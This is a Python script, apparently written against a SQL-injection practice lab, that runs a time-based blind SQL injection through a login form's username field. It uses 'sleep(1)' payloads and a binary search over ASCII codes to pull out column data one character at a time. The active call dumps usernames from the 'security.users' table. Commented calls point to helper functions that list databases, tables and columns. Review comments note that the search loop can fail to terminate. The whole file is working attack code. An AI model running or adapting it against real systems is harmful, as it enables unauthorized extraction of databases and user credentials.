def Dump(database_name: str, table_name: str, columns_name: str) -> None:
    """Print the comma-joined values of one column of ``database_name.table_name``, recovered by time-based blind POST probes.

    Args:
        database_name: schema name, interpolated unquoted into ``from %s.%s``.
        table_name: table name, interpolated unquoted into ``from %s.%s``.
        columns_name: column expression placed inside ``group_concat(...)``.

    Uses the module-level ``url`` and ``headers``; returns nothing. A probe
    is "true" when the request takes longer than 0.5 s. Positions 1..999 are
    resolved by a binary search over ASCII 32..126.
    """
    dump=""
    for i in range(1,1000):
        # Printable-ASCII search window for the character at position i.
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            payload1 = '''admin") and  if((select ascii(substr(group_concat(%s),%d,1)) from %s.%s) =%d,sleep(1),1) # '''%(columns_name,i,database_name,table_name,mid)
            data1={
                'uname':payload1,
                'passwd':'',
                'submit':'Submit',
            }
            start_time=time.time()
            # Response body is discarded; only the elapsed wall-clock time matters.
            requests.post(url , data=data1,headers=headers)
            # Timer spans the whole request (no timeout), so latency counts too.
            if (time.time()-start_time>0.5):
                dump+=chr(mid)
                print(dump)
                break
            payload2 = '''admin") and  if((select ascii(substr(group_concat(%s),%d,1)) from %s.%s) >%d,sleep(1),1) # '''%(columns_name,i,database_name,table_name,mid)
            data2={
            'uname':payload2,
            'passwd':'',
            'submit':'Submit',
            }
            start_time=time.time()
            # text2 is never read; only the elapsed time is used.
            text2 = requests.post(url ,data=data2, headers=headers).text
            if (time.time()-start_time>0.5):
                left=mid
            else:
                right=mid
            # NOTE(review): a slow equality probe is the only exit; when
            # right == left + 1 and neither probe is slow, this loop never
            # terminates and the final print is not reached.
    print("dump:",dump)

# Script entry: only Dump("security","users","username") is active; the
# other calls are kept commented out as usage examples. Runs on import.

# Print the current database name
# Database_name()

# Print all database names
# Databases_names()

# Print the table names of a given database
# argument: database name
# Tables_name("security")

# Print the column names of a given table
# argument: table name
# Columns_name("users")

# Print the contents of a given database/table/column
Dump("security","users","username")

 

 

 
